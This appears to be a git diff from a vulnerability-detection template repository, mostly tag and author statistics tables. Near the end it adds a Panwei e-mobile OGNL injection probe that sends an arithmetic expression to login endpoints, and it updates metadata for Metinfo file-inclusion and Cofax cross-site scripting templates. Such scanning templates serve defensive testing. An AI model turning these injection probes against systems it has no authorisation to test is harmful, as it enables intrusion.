+| reddit | 1 | | | | | | | | |
+| barco | 1 | | | | | | | | |
+| txt | 1 | | | | | | | | |
+| securitytrails | 1 | | | | | | | | |
+| franklinfueling | 1 | | | | | | | | |
+| nzbget | 1 | | | | | | | | |
+| sling | 1 | | | | | | | | |
+| xmpp | 1 | | | | | | | | |
+| dompdf | 1 | | | | | | | | |
+| craftmypdf | 1 | | | | | | | | |
+| covalent | 1 | | | | | | | | |
+| uservoice | 1 | | | | | | | | |
+| honeywell | 1 | | | | | | | | |
+| helpdesk | 1 | | | | | | | | |
+| pdflayer | 1 | | | | | | | | |
+| smartsense | 1 | | | | | | | | |
+| route | 1 | | | | | | | | |
+| shopizer | 1 | | | | | | | | |
+| pypicloud | 1 | | | | | | | | |
+| elevation | 1 | | | | | | | | |
+| front | 1 | | | | | | | | |
+| nc2 | 1 | | | | | | | | |
+| klog | 1 | | | | | | | | |
+| trello | 1 | | | | | | | | |
+| zoneminder | 1 | | | | | | | | |
+| karel | 1 | | | | | | | | |
+| sterling | 1 | | | | | | | | |
+| clearcom | 1 | | | | | | | | |
+| wbcecms | 1 | | | | | | | | |
+| getgrav | 1 | | | | | | | | |
+| v2924 | 1 | | | | | | | | |
+| blackboard | 1 | | | | | | | | |
+| petfinder | 1 | | | | | | | | |
+| spip | 1 | | | | | | | | |
+| planon | 1 | | | | | | | | |
+| softaculous | 1 | | | | | | | | |
+| piluscart | 1 | | | | | | | | |
+| yishaadmin | 1 | | | | | | | | |
+| express | 1 | | | | | | | | |
+| csrfguard | 1 | | | | | | | | |
+| proxykingdom | 1 | | | | | | | | |
+| tarantella | 1 | | | | | | | | |
+| adoptapet | 1 | | | | | | | | |
+| openpagerank | 1 | | | | | | | | |
+| saml | 1 | | | | | | | | |
+| sgp | 1 | | | | | | | | |
+| purestorage | 1 | | | | | | | | |
+| cvent | 1 | | | | | | | | |
+| qmail | 1 | | | | | | | | |
+| sauter | 1 | | | | | | | | |
+| gocron | 1 | | | | | | | | |
+| postgres | 1 | | | | | | | | |
+| mediumish | 1 | | | | | | | | |
+| kronos | 1 | | | | | | | | |
+| pinata | 1 | | | | | | | | |
+| wordnik | 1 | | | | | | | | |
+| imagements | 1 | | | | | | | | |
+| abbott | 1 | | | | | | | | |
+| buddypress | 1 | | | | | | | | |
+| lgate | 1 | | | | | | | | |
+| bscw | 1 | | | | | | | | |
+| genie | 1 | | | | | | | | |
+| accessmanager | 1 | | | | | | | | |
+| loancms | 1 | | | | | | | | |
+| checkmarx | 1 | | | | | | | | |
+| buildbot | 1 | | | | | | | | |
+| opensmtpd | 1 | | | | | | | | |
+| zmanda | 1 | | | | | | | | |
+| catfishcms | 1 | | | | | | | | |
+| pan | 1 | | | | | | | | |
+| workspace | 1 | | | | | | | | |
+| aspnuke | 1 | | | | | | | | |
+| moonpay | 1 | | | | | | | | |
+| directions | 1 | | | | | | | | |
+| supportivekoala | 1 | | | | | | | | |
+| delta | 1 | | | | | | | | |
+| coinmarketcap | 1 | | | | | | | | |
+| ncbi | 1 | | | | | | | | |
+| netbeans | 1 | | | | | | | | |
+| netrc | 1 | | | | | | | | |
+| ccm | 1 | | | | | | | | |
+| memory-pipes | 1 | | | | | | | | |
+| richfaces | 1 | | | | | | | | |
+| h3c-imc | 1 | | | | | | | | |
+| pagespeed | 1 | | | | | | | | |
+| rdp | 1 | | | | | | | | |
+| block | 1 | | | | | | | | |
+| supervisor | 1 | | | | | | | | |
+| etcd | 1 | | | | | | | | |
+| labtech | 1 | | | | | | | | |
+| sunflower | 1 | | | | | | | | |
+| eyou | 1 | | | | | | | | |
+| webp | 1 | | | | | | | | |
+| rainloop | 1 | | | | | | | | |
+| openethereum | 1 | | | | | | | | |
+| cve2001 | 1 | | | | | | | | |
+| beanshell | 1 | | | | | | | | |
+| cron | 1 | | | | | | | | |
+| activecollab | 1 | | | | | | | | |
+| majordomo2 | 1 | | | | | | | | |
+| muhttpd | 1 | | | | | | | | |
+| login-bypass | 1 | | | | | | | | |
+| eibiz | 1 | | | | | | | | |
+| admin | 1 | | | | | | | | |
+| adfs | 1 | | | | | | | | |
+| owa | 1 | | | | | | | | |
+| buttercms | 1 | | | | | | | | |
+| ricoh | 1 | | | | | | | | |
+| panwei | 1 | | | | | | | | |
+| tianqing | 1 | | | | | | | | |
+| dwr | 1 | | | | | | | | |
+| kodi | 1 | | | | | | | | |
+| revealjs | 1 | | | | | | | | |
+| javafaces | 1 | | | | | | | | |
+| knowage | 1 | | | | | | | | |
+| shiro | 1 | | | | | | | | |
+| accent | 1 | | | | | | | | |
+| dolphinscheduler | 1 | | | | | | | | |
+| cmsimple | 1 | | | | | | | | |
+| eyoucms | 1 | | | | | | | | |
+| opencast | 1 | | | | | | | | |
+| cherokee | 1 | | | | | | | | |
+| webex | 1 | | | | | | | | |
+| stackstorm | 1 | | | | | | | | |
+| avalanche | 1 | | | | | | | | |
+| e-mobile | 1 | | | | | | | | |
+| ilo4 | 1 | | | | | | | | |
+| sitemap | 1 | | | | | | | | |
+| primetek | 1 | | | | | | | | |
+| sourcebans | 1 | | | | | | | | |
+| sitefinity | 1 | | | | | | | | |
+| xmlchart | 1 | | | | | | | | |
+| ait-csv | 1 | | | | | | | | |
+| pyramid | 1 | | | | | | | | |
+| epm | 1 | | | | | | | | |
+| monday | 1 | | | | | | | | |
+| aura | 1 | | | | | | | | |
+| bolt | 1 | | | | | | | | |
+| wallix | 1 | | | | | | | | |
+| wowza | 1 | | | | | | | | |
+| adWidget | 1 | | | | | | | | |
+| particle | 1 | | | | | | | | |
+| zarafa | 1 | | | | | | | | |
+| bingmaps | 1 | | | | | | | | |
+| comfortel | 1 | | | | | | | | |
+| opsview | 1 | | | | | | | | |
+| interlib | 1 | | | | | | | | |
+| thinkserver | 1 | | | | | | | | |
+| alertmanager | 1 | | | | | | | | |
+| pivotaltracker | 1 | | | | | | | | |
+| xunchi | 1 | | | | | | | | |
+| icc-pro | 1 | | | | | | | | |
+| microfinance | 1 | | | | | | | | |
+| scrapingant | 1 | | | | | | | | |
+| pendo | 1 | | | | | | | | |
+| nexusdb | 1 | | | | | | | | |
+| verint | 1 | | | | | | | | |
+| eyelock | 1 | | | | | | | | |
+| xproxy | 1 | | | | | | | | |
+| lutron | 1 | | | | | | | | |
+| mariadb | 1 | | | | | | | | |
+| pagerduty | 1 | | | | | | | | |
+| ganglia | 1 | | | | | | | | |
+| php-fusion | 1 | | | | | | | | |
+| sourcecodester | 1 | | | | | | | | |
+| tinymce | 1 | | | | | | | | |
+| acme | 1 | | | | | | | | |
+| pippoint | 1 | | | | | | | | |
+| onelogin | 1 | | | | | | | | |
+| zerodium | 1 | | | | | | | | |
+| imap | 1 | | | | | | | | |
+| moinmoin | 1 | | | | | | | | |
+| zzcms | 1 | | | | | | | | |
+| pushgateway | 1 | | | | | | | | |
+| ruoyi | 1 | | | | | | | | |
+| feifeicms | 1 | | | | | | | | |
+| lob | 1 | | | | | | | | |
+| wifisky | 1 | | | | | | | | |
+| dixell | 1 | | | | | | | | |
+| hue | 1 | | | | | | | | |
+| goahead | 1 | | | | | | | | |
+| phpfastcache | 1 | | | | | | | | |
+| omi | 1 | | | | | | | | |
+| haproxy | 1 | | | | | | | | |
+| opengear | 1 | | | | | | | | |
+| tracking | 1 | | | | | | | | |
+| collegemanagement | 1 | | | | | | | | |
+| satellian | 1 | | | | | | | | |
+| oscommerce | 1 | | | | | | | | |
+| cname | 1 | | | | | | | | |
+| jsonbin | 1 | | | | | | | | |
+| clockwork | 1 | | | | | | | | |
+| googlemaps | 1 | | | | | | | | |
+| okta | 1 | | | | | | | | |
+| aqua | 1 | | | | | | | | |
+| ns | 1 | | | | | | | | |
+| fleet | 1 | | | | | | | | |
+| viewlinc | 1 | | | | | | | | |
+| caa | 1 | | | | | | | | |
+| etouch | 1 | | | | | | | | |
+| xml | 1 | | | | | | | | |
+| ewebs | 1 | | | | | | | | |
+| cryptocurrencies | 1 | | | | | | | | |
+| orangeforum | 1 | | | | | | | | |
+| svnserve | 1 | | | | | | | | |
+| netgenie | 1 | | | | | | | | |
+| scraperbox | 1 | | | | | | | | |
+| svn | 1 | | | | | | | | |
+| intelliflash | 1 | | | | | | | | |
+| distance | 1 | | | | | | | | |
+| logontracer | 1 | | | | | | | | |
+| zcms | 1 | | | | | | | | |
+| misconfiguration | 1 | | | | | | | | |
+| cx | 1 | | | | | | | | |
+| calendarific | 1 | | | | | | | | |
+| landray | 1 | | | | | | | | |
+| natemail | 1 | | | | | | | | |
+| satellite | 1 | | | | | | | | |
+| directorist | 1 | | | | | | | | |
+| europeana | 1 | | | | | | | | |
+| maxsite | 1 | | | | | | | | |
+| emc | 1 | | | | | | | | |
+| jeewms | 1 | | | | | | | | |
+| sqwebmail | 1 | | | | | | | | |
+| xenmobile | 1 | | | | | | | | |
+| hanming | 1 | | | | | | | | |
+| bonita | 1 | | | | | | | | |
+| biostar2 | 1 | | | | | | | | |
+| quantum | 1 | | | | | | | | |
+| amdoren | 1 | | | | | | | | |
+| arl | 1 | | | | | | | | |
+| olivetti | 1 | | | | | | | | |
+| burp | 1 | | | | | | | | |
+| whmcs | 1 | | | | | | | | |
+| mirasys | 1 | | | | | | | | |
+| cors | 1 | | | | | | | | |
+| jgraph | 1 | | | | | | | | |
+| oki | 1 | | | | | | | | |
+| blitapp | 1 | | | | | | | | |
+| restler | 1 | | | | | | | | |
+| blue-ocean | 1 | | | | | | | | |
+| csod | 1 | | | | | | | | |
+| webpconverter | 1 | | | | | | | | |
+| currencylayer | 1 | | | | | | | | |
+| panasonic | 1 | | | | | | | | |
+| webshell4 | 1 | | | | | | | | |
+| upnp | 1 | | | | | | | | |
+| event | 1 | | | | | | | | |
+| management | 1 | | | | | | | | |
+| meraki | 1 | | | | | | | | |
+| xiuno | 1 | | | | | | | | |
+| cvms | 1 | | | | | | | | |
+| antsword | 1 | | | | | | | | |
+| optiLink | 1 | | | | | | | | |
+| archibus | 1 | | | | | | | | |
+| mastodon | 1 | | | | | | | | |
+| fcm | 1 | | | | | | | | |
+| sceditor | 1 | | | | | | | | |
+| fanwei | 1 | | | | | | | | |
+| allied | 1 | | | | | | | | |
+| clickup | 1 | | | | | | | | |
+| exchangerateapi | 1 | | | | | | | | |
+| roteador | 1 | | | | | | | | |
+| webui | 1 | | | | | | | | |
+| concourse | 1 | | | | | | | | |
+| b2bbuilder | 1 | | | | | | | | |
+| tracing | 1 | | | | | | | | |
+| qizhi | 1 | | | | | | | | |
+| mojoauth | 1 | | | | | | | | |
+| yopass | 1 | | | | | | | | |
+| chinaunicom | 1 | | | | | | | | |
+| shoretel | 1 | | | | | | | | |
+| contentful | 1 | | | | | | | | |
+| htmli | 1 | | | | | | | | |
+| cscart | 1 | | | | | | | | |
+| fusion | 1 | | | | | | | | |
+| virustotal | 1 | | | | | | | | |
+| novus | 1 | | | | | | | | |
+| deviantart | 1 | | | | | | | | |
+| saltapi | 1 | | | | | | | | |
+| securenvoy | 1 | | | | | | | | |
+| bibliosoft | 1 | | | | | | | | |
+| springframework | 1 | | | | | | | | |
+| tembosocial | 1 | | | | | | | | |
+| opennms | 1 | | | | | | | | |
+| dasan | 1 | | | | | | | | |
+| huemagic | 1 | | | | | | | | |
+| asana | 1 | | | | | | | | |
+| jspxcms | 1 | | | | | | | | |
+| magicflow | 1 | | | | | | | | |
+| appveyor | 1 | | | | | | | | |
+| xdcms | 1 | | | | | | | | |
+| screenshot | 1 | | | | | | | | |
+| vibe | 1 | | | | | | | | |
+| adafruit | 1 | | | | | | | | |
+| proxycrawl | 1 | | | | | | | | |
+| iserver | 1 | | | | | | | | |
+| bazarr | 1 | | | | | | | | |
+| cofense | 1 | | | | | | | | |
+| streetview | 1 | | | | | | | | |
+| mediation | 1 | | | | | | | | |
+| viaware | 1 | | | | | | | | |
+| dvdFab | 1 | | | | | | | | |
+| caddy | 1 | | | | | | | | |
+| tor | 1 | | | | | | | | |
+| submitty | 1 | | | | | | | | |
+| mitel | 1 | | | | | | | | |
+| buildkite | 1 | | | | | | | | |
+| webmodule-ee | 1 | | | | | | | | |
+| dss | 1 | | | | | | | | |
+| iceflow | 1 | | | | | | | | |
+| gitblit | 1 | | | | | | | | |
+| webnms | 1 | | | | | | | | |
+| raspap | 1 | | | | | | | | |
+| easyappointments | 1 | | | | | | | | |
+| quip | 1 | | | | | | | | |
+| fullhunt | 1 | | | | | | | | |
+| gstorage | 1 | | | | | | | | |
+| daybyday | 1 | | | | | | | | |
+| ddownload | 1 | | | | | | | | |
+| ipfind | 1 | | | | | | | | |
+| nownodes | 1 | | | | | | | | |
+| gateone | 1 | | | | | | | | |
+| oliver | 1 | | | | | | | | |
+| racksnet | 1 | | | | | | | | |
+| geocode | 1 | | | | | | | | |
+| newrelic | 1 | | | | | | | | |
+| details | 1 | | | | | | | | |
+| mailwatch | 1 | | | | | | | | |
+| spf | 1 | | | | | | | | |
+| fatwire | 1 | | | | | | | | |
+| cve2002 | 1 | | | | | | | | |
+| tekon | 1 | | | | | | | | |
+| vcloud | 1 | | | | | | | | |
+| mdm | 1 | | | | | | | | |
+| neo4j | 1 | | | | | | | | |
+| kerio | 1 | | | | | | | | |
+| icinga | 1 | | | | | | | | |
+| web-suite | 1 | | | | | | | | |
+| containers | 1 | | | | | | | | |
+| phabricator | 1 | | | | | | | | |
+| mongoshake | 1 | | | | | | | | |
+| sucuri | 1 | | | | | | | | |
+| serverstatus | 1 | | | | | | | | |
+| nweb2fax | 1 | | | | | | | | |
+| yealink | 1 | | | | | | | | |
+| binance | 1 | | | | | | | | |
+| pagecdn | 1 | | | | | | | | |
+| librenms | 1 | | | | | | | | |
+| okiko | 1 | | | | | | | | |
+| barracuda | 1 | | | | | | | | |
+| werkzeug | 1 | | | | | | | | |
+| wazuh | 1 | | | | | | | | |
+| suprema | 1 | | | | | | | | |
+| flask | 1 | | | | | | | | |
+| dreamweaver | 1 | | | | | | | | |
+| idera | 1 | | | | | | | | |
+| opm | 1 | | | | | | | | |
+| esxi | 1 | | | | | | | | |
+| shindig | 1 | | | | | | | | |
+| nj2000 | 1 | | | | | | | | |
+| omniampx | 1 | | | | | | | | |
+| clickhouse | 1 | | | | | | | | |
+| ethereum | 1 | | | | | | | | |
+| ecsimagingpacs | 1 | | | | | | | | |
+| luftguitar | 1 | | | | | | | | |
+| ssi | 1 | | | | | | | | |
+| expn | 1 | | | | | | | | |
+| axxonsoft | 1 | | | | | | | | |
+| binaryedge | 1 | | | | | | | | |
+| nordex | 1 | | | | | | | | |
+| puppetdb | 1 | | | | | | | | |
+| remkon | 1 | | | | | | | | |
+| flexbe | 1 | | | | | | | | |
+| formalms | 1 | | | | | | | | |
+| prexview | 1 | | | | | | | | |
+| privx | 1 | | | | | | | | |
+| hcl | 1 | | | | | | | | |
+| qvisdvr | 1 | | | | | | | | |
+| robomongo | 1 | | | | | | | | |
+| piano | 1 | | | | | | | | |
+| ez | 1 | | | | | | | | |
+| zaver | 1 | | | | | | | | |
+| biometrics | 1 | | | | | | | | |
+| sprintful | 1 | | | | | | | | |
+| debounce | 1 | | | | | | | | |
+| wmt | 1 | | | | | | | | |
+| led | 1 | | | | | | | | |
+| iterable | 1 | | | | | | | | |
+| fedora | 1 | | | | | | | | |
+| web3storage | 1 | | | | | | | | |
+| smartblog | 1 | | | | | | | | |
+| ecom | 1 | | | | | | | | |
+| dericam | 1 | | | | | | | | |
+| varnish | 1 | | | | | | | | |
+| bash | 1 | | | | | | | | |
+| boa | 1 | | | | | | | | |
+| kyan | 1 | | | | | | | | |
+| scrapestack | 1 | | | | | | | | |
+| savepage | 1 | | | | | | | | |
+| mofi | 1 | | | | | | | | |
+| clink-office | 1 | | | | | | | | |
+| powerjob | 1 | | | | | | | | |
+| lenovo | 1 | | | | | | | | |
+| teltonika | 1 | | | | | | | | |
+| urlscan | 1 | | | | | | | | |
+| codestats | 1 | | | | | | | | |
+| bitcoinaverage | 1 | | | | | | | | |
+| solman | 1 | | | | | | | | |
+| phpunit | 1 | | | | | | | | |
+| bing | 1 | | | | | | | | |
+| nette | 1 | | | | | | | | |
+| bible | 1 | | | | | | | | |
+| jeecg-boot | 1 | | | | | | | | |
+| scraperapi | 1 | | | | | | | | |
+| intouch | 1 | | | | | | | | |
+| extreme | 1 | | | | | | | | |
+| aerohive | 1 | | | | | | | | |
+| bigfix | 1 | | | | | | | | |
+| shopxo | 1 | | | | | | | | |
+| esmtp | 1 | | | | | | | | |
+| visualstudio | 1 | | | | | | | | |
+| fms | 1 | | | | | | | | |
+| yzmcms | 1 | | | | | | | | |
+| blueiris | 1 | | | | | | | | |
+| mkdocs | 1 | | | | | | | | |
+| acontent | 1 | | | | | | | | |
+| shortcode | 1 | | | | | | | | |
+| leostream | 1 | | | | | | | | |
+| rss | 1 | | | | | | | | |
+| bibliopac | 1 | | | | | | | | |
+| bhagavadgita | 1 | | | | | | | | |
+| holidayapi | 1 | | | | | | | | |
+| shoppable | 1 | | | | | | | | |
+| tensorflow | 1 | | | | | | | | |
+| fastvue | 1 | | | | | | | | |
+| web3 | 1 | | | | | | | | |
+| kingdee | 1 | | | | | | | | |
+| hiboss | 1 | | | | | | | | |
+| fancyproduct | 1 | | | | | | | | |
+| lg-nas | 1 | | | | | | | | |
+| ocs-inventory | 1 | | | | | | | | |
+| addpac | 1 | | | | | | | | |
+| idemia | 1 | | | | | | | | |
+| fhem | 1 | | | | | | | | |
+| thedogapi | 1 | | | | | | | | |
+| flowdash | 1 | | | | | | | | |
+| cnvd2022 | 1 | | | | | | | | |
+| memcached | 1 | | | | | | | | |
+| anycomment | 1 | | | | | | | | |
+| smuggling | 1 | | | | | | | | |
+| emerson | 1 | | | | | | | | |
+| opencart | 1 | | | | | | | | |
+| gargoyle | 1 | | | | | | | | |
+| plone | 1 | | | | | | | | |
+| dbeaver | 1 | | | | | | | | |
+| rijksmuseum | 1 | | | | | | | | |
+| dlp | 1 | | | | | | | | |
+| kindeditor | 1 | | | | | | | | |
+| pulsesecure | 1 | | | | | | | | |
+| zoomeye | 1 | | | | | | | | |
+| api2convert | 1 | | | | | | | | |
+| festivo | 1 | | | | | | | | |
+| sureline | 1 | | | | | | | | |
+| teradici | 1 | | | | | | | | |
+| google-earth | 1 | | | | | | | | |
+| dnssec | 1 | | | | | | | | |
+| web-dispatcher | 1 | | | | | | | | |
+| malwarebazaar | 1 | | | | | | | | |
+| fortigates | 1 | | | | | | | | |
+| babel | 1 | | | | | | | | |
+| revive | 1 | | | | | | | | |
+| emlog | 1 | | | | | | | | |
+| kodexplorer | 1 | | | | | | | | |
+| dir-615 | 1 | | | | | | | | |
+| spartacus | 1 | | | | | | | | |
+| expressjs | 1 | | | | | | | | |
+| ncomputing | 1 | | | | | | | | |
+| playsms | 1 | | | | | | | | |
+| thinkadmin | 1 | | | | | | | | |
+| h2 | 1 | | | | | | | | |
+| lfw | 1 | | | | | | | | |
+| gsoap | 1 | | | | | | | | |
+| jinfornet | 1 | | | | | | | | |
+| blackduck | 1 | | | | | | | | |
+| segment | 1 | | | | | | | | |
+| hdnetwork | 1 | | | | | | | | |
+| cofax | 1 | | | | | | | | |
+| nimsoft | 1 | | | | | | | | |
+| clockify | 1 | | | | | | | | |
+| 1forge | 1 | | | | | | | | |
+| credential | 1 | | | | | | | | |
+| yachtcontrol | 1 | | | | | | | | |
+| iframe | 1 | | | | | | | | |
+| unauthenticated | 1 | | | | | | | | |
+| themefusion | 1 | | | | | | | | |
+| manager | 1 | | | | | | | | |
+| razer | 1 | | | | | | | | |
+| keenetic | 1 | | | | | | | | |
+| extractor | 1 | | | | | | | | |
+| phpminiadmin | 1 | | | | | | | | |
+| issabel | 1 | | | | | | | | |
+| wordcloud | 1 | | | | | | | | |
+| noptin | 1 | | | | | | | | |
+| spiderfoot | 1 | | | | | | | | |
+| curcy | 1 | | | | | | | | |
+| strava | 1 | | | | | | | | |
+| 3com | 1 | | | | | | | | |
+| b2evolution | 1 | | | | | | | | |
+| cloudconvert | 1 | | | | | | | | |
+| api-manager | 1 | | | | | | | | |
+| mediacloud | 1 | | | | | | | | |
+| kenesto | 1 | | | | | | | | |
+| vault | 1 | | | | | | | | |
+| iplanet | 1 | | | | | | | | |
+| commvault | 1 | | | | | | | | |
+| discourse | 1 | | | | | | | | |
+| synnefo | 1 | | | | | | | | |
+| radius | 1 | | | | | | | | |
+| bravenewcoin | 1 | | | | | | | | |
+| currencyscoop | 1 | | | | | | | | |
+| powertek | 1 | | | | | | | | |
+| zap | 1 | | | | | | | | |
+| primefaces | 1 | | | | | | | | |
+| billquick | 1 | | | | | | | | |
+| zenrows | 1 | | | | | | | | |
+| email | 1 | | | | | | | | |
+| wiki | 1 | | | | | | | | |
+| mspcontrol | 1 | | | | | | | | |
+| pods | 1 | | | | | | | | |
+| phpsec | 1 | | | | | | | | |
+| clearbit | 1 | | | | | | | | |
+| sonarcloud | 1 | | | | | | | | |
+| secnet-ac | 1 | | | | | | | | |
+| ignition | 1 | | | | | | | | |
+| jsapi | 1 | | | | | | | | |
+| analytify | 1 | | | | | | | | |
+| geolocation | 1 | | | | | | | | |
+| commscope | 1 | | | | | | | | |
+| totolink | 1 | | | | | | | | |
+| zuul | 1 | | | | | | | | |
+| appweb | 1 | | | | | | | | |
+| scs | 1 | | | | | | | | |
+| jenkin | 1 | | | | | | | | |
+| hostio | 1 | | | | | | | | |
+| geutebruck | 1 | | | | | | | | |
+| trane | 1 | | | | | | | | |
+| termtalk | 1 | | | | | | | | |
+| mantis | 1 | | | | | | | | |
+| sympa | 1 | | | | | | | | |
+| orbintelligence | 1 | | | | | | | | |
+| markdown | 1 | | | | | | | | |
+| floc | 1 | | | | | | | | |
+| hetzner | 1 | | | | | | | | |
+| fastapi | 1 | | | | | | | | |
+| chronoforums | 1 | | | | | | | | |
+| dicoogle | 1 | | | | | | | | |
+| netbiblio | 1 | | | | | | | | |
+| kerbynet | 1 | | | | | | | | |
+| find | 1 | | | | | | | | |
+| processmaker | 1 | | | | | | | | |
+| fortressaircraft | 1 | | | | | | | | |
+| opencti | 1 | | | | | | | | |
+| cse | 1 | | | | | | | | |
+| coinapi | 1 | | | | | | | | |
+| acexy | 1 | | | | | | | | |
+| nvrmini | 1 | | | | | | | | |
+| nifi | 1 | | | | | | | | |
+| hanwang | 1 | | | | | | | | |
+| alerta | 1 | | | | | | | | |
+| xyxel | 1 | | | | | | | | |
+| cve2004 | 1 | | | | | | | | |
+| default-page | 1 | | | | | | | | |
+| c99 | 1 | | | | | | | | |
+| screenshotapi | 1 | | | | | | | | |
+| redcap | 1 | | | | | | | | |
+| msmtp | 1 | | | | | | | | |
+| mobile | 1 | | | | | | | | |
+| behat | 1 | | | | | | | | |
+| bitbucket | 1 | | | | | | | | |
+| qualcomm | 1 | | | | | | | | |
+| thecatapi | 1 | | | | | | | | |
+| currencyfreaks | 1 | | | | | | | | |
+| jupyterhub | 1 | | | | | | | | |
+| monitorix | 1 | | | | | | | | |
+| spotify | 1 | | | | | | | | |
+| spectracom | 1 | | | | | | | | |
+| videoxpert | 1 | | | | | | | | |
+| m-files | 1 | | | | | | | | |
+| wago | 1 | | | | | | | | |
+| drive | 1 | | | | | | | | |
+| sv3c | 1 | | | | | | | | |
+| intelbras | 1 | | | | | | | | |
+| incapptic-connect | 1 | | | | | | | | |
+| trilithic | 1 | | | | | | | | |
+| prototype | 1 | | | | | | | | |
+| cve2000 | 1 | | | | | | | | |
+| optimizely | 1 | | | | | | | | |
+| krweb | 1 | | | | | | | | |
+| jaspersoft | 1 | | | | | | | | |
+| alumni | 1 | | | | | | | | |
+| mx | 1 | | | | | | | | |
+| mi | 1 | | | | | | | | |
+| calendarix | 1 | | | | | | | | |
+| awin | 1 | | | | | | | | |
+| speed | 1 | | | | | | | | |
+| axiom | 1 | | | | | | | | |
+| expose | 1 | | | | | | | | |
+| webftp | 1 | | | | | | | | |
+| razor | 1 | | | | | | | | |
+| stored | 1 | | | | | | | | |
+| groupoffice | 1 | | | | | | | | |
+| rmi | 1 | | | | | | | | |
+| placeos | 1 | | | | | | | | |
+| defi | 1 | | | | | | | | |
+| onlinefarm | 1 | | | | | | | | |
+| opensearch | 1 | | | | | | | | |
+| taiga | 1 | | | | | | | | |
+| diris | 1 | | | | | | | | |
+| twitter-server | 1 | | | | | | | | |
+| pyproject | 1 | | | | | | | | |
+| synapse | 1 | | | | | | | | |
+| simplecrm | 1 | | | | | | | | |
+| mrtg | 1 | | | | | | | | |
+| jumpcloud | 1 | | | | | | | | |
+| strider | 1 | | | | | | | | |
+| workreap | 1 | | | | | | | | |
+| surreal | 1 | | | | | | | | |
+| loganalyzer | 1 | | | | | | | | |
+| reprise | 1 | | | | | | | | |
+| camunda | 1 | | | | | | | | |
+| bitquery | 1 | | | | | | | | |
+| autocomplete | 1 | | | | | | | | |
diff --git a/TOP-10.md b/TOP-10.md
index 98ed1f88da..8117810855 100644
--- a/TOP-10.md
+++ b/TOP-10.md
@@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
-| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
-| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
-| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
-| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
-| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
-| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
-| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
-| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
-| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
+| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
+| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
+| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
+| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
+| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
+| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
+| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
+| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
+| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
+| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
diff --git a/cnvd/2017/CNVD-2017-03561.yaml b/cnvd/2017/CNVD-2017-03561.yaml
new file mode 100644
index 0000000000..efd58260a4
--- /dev/null
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@@ -0,0 +1,34 @@
+id: CNVD-2017-03561
+
+info:
+ name: Panwei e-mobile - Ognl Injection
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
+ metadata:
+ verified: true
+ fofa-query: app="ๆณๅพฎ-eMobile"
+ tags: cnvd,cnvd2017,emobile,ognl,panwei
+
+variables:
+ num1: "9999"
+ num2: "5555"
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
+ - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '55544445'
+
+ - type: status
+ status:
+ - 200
diff --git a/cnvd/2018/CNVD-2018-13393.yaml b/cnvd/2018/CNVD-2018-13393.yaml
index 0cce50c757..f215ee7764 100644
--- a/cnvd/2018/CNVD-2018-13393.yaml
+++ b/cnvd/2018/CNVD-2018-13393.yaml
@@ -1,11 +1,16 @@
id: CNVD-2018-13393
info:
- name: Metinfo LFI
+ name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
+ description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-22
tags: metinfo,cnvd,cvnd2018,lfi
requests:
@@ -23,3 +28,5 @@ requests:
- "Horde :: User Administration"
- condition: and
- type: status
status:
diff --git a/cves/2005/CVE-2005-4385.yaml b/cves/2005/CVE-2005-4385.yaml
index 8d3c3a2d81..1e9d1f456d 100644
--- a/cves/2005/CVE-2005-4385.yaml
+++ b/cves/2005/CVE-2005-4385.yaml
@@ -1,12 +1,13 @@
id: CVE-2005-4385
info:
- name: Cofax <= 2.0RC3 XSS
+ name: Cofax <=2.0RC3 - Cross-Site Scripting
author: geeknik
severity: medium
- description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
+ description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
+ - http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
classification:
cve-id: CVE-2005-4385
@@ -26,3 +27,5 @@ requests:
part: body
words:
- "'>\""
+
+# Enhanced by mp on 2022/08/12
